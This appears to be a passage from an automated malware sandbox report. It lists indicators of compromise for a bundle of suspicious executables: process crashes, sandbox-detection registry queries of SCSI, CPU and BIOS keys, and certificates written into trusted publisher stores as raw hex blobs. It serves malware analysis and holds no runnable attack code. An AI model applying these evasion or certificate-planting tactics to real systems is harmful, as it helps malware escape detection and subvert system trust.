expand.exemsiexec.exeWerFault.exedescription ioc process File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe File created C:\Windows\Installer\f768f0d.msi msiexec.exe File opened for modification C:\Windows\Installer\f768f0d.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIBBF9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF692.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4608 860 WerFault.exe pub2.exe 3736 3792 WerFault.exe Info.exe 3660 2288 WerFault.exe rundll32.exe 3548 744 WerFault.exe Install.exe 668 3904 WerFault.exe gq7BdFzcCpgT9R8qUlDBiVoJ.exe 3832 3636 WerFault.exe HigBkRPx0qyWn99cHptOkbti.exe 4164 5080 WerFault.exe AE4Cr0V8AbXUi2Vh3WIgJzcr.exe 2184 3896 WerFault.exe ZH_D8d_woMBuwaliVLK7dXsO.exe 2796 1524 WerFault.exe LGCH2-401_2021-08-18_14-40.exe 4824 4612 WerFault.exe TNGkwm8vY3ofA8gUTLfxgcxK.exe 3532 4844 WerFault.exe n5iK85pyxBdO3WOr6bRNQ6xx.exe 5508 2384 WerFault.exe askinstall53.exe 6332 6248 WerFault.exe bEQOSwZfLy35v67HMStZes1l.exe 7112 4640 WerFault.exe WchvfjN_dzKFtUxFm7qRXxfF.exe 5744 3116 WerFault.exe rundll32.exe 3728 6236 WerFault.exe xLqNvme6hoDlPTgBHwIDSLik.exe 6984 6392 WerFault.exe ewz7aGhr4LCktqJ0Uq05IHJx.exe 5948 3712 WerFault.exe 6609898.exe 3240 6492 WerFault.exe asMNUD7Whzsx89sAGP_aLokg.exe 6740 1212 WerFault.exe rundll32.exe 1536 5880 WerFault.exe 8324748.exe 6628 5132 WerFault.exe vdi_compiler.exe 5340 5212 WerFault.exe 5999348.exe 6180 6800 WerFault.exe GcleanerEU.exe 6128 6456 WerFault.exe gcleaner.exe 6340 1752 WerFault.exe rundll32.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeSetup.tmpWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Setup.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Setup.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Setup.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Enumerates system info in registry 2 TTPs 42 IoCs
Processes:
WerFault.exeWerFault.exeSetup.tmpWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Setup.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Setup.tmp Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com -
Modifies data under HKEY_USERS 43 IoCs
Processes:
sihclient.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe -
Processes:
Setup.exeSetup.tmpGameBoxWin64.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f